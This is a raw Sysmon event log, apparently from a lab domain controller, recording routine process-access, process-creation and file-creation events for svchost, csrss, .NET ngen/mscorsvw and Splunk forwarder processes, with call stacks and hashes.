13:25:16.554{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007659Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.554{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007658Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.554{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007657Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.554{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007656Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.554{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007655Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.554{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007654Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.554{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007653Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.554{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007652Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.554{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007651Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.554{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-463C-6000-7B03-000000009A01}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007650Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.554{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-463C-6000-7B03-000000009A01}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007649Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.555{08A6967A-463C-6000-7B03-000000009A01}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007648Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.257{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463C-6000-7A03-000000009A01}3036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007647Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.242{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-463C-6000-7A03-000000009A01}3036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007646Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.242{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463C-6000-7A03-000000009A01}3036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007645Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.179{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463C-6000-7903-000000009A01}3408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007644Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.164{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-463C-6000-7903-000000009A01}3408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007643Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.164{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463C-6000-7903-000000009A01}3408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007642Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:16.039{08A6967A-463A-6000-7603-000000009A01}744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\2e8-0\Microsoft.ActiveDirectory.Management.dll2021-01-14 13:25:16.039 10341000x80000000000000007641Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:16.039{08A6967A-463B-6000-7803-000000009A01}39763776C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007730Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.914{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463D-6000-8603-000000009A01}3900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007729Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.914{08A6967A-463D-6000-8403-000000009A01}30564408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007728Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.898{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-463D-6000-8603-000000009A01}3900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007727Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.898{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463D-6000-8603-000000009A01}3900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007726Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.851{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463D-6000-8503-000000009A01}1036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007725Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.836{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-463D-6000-8503-000000009A01}1036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007724Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 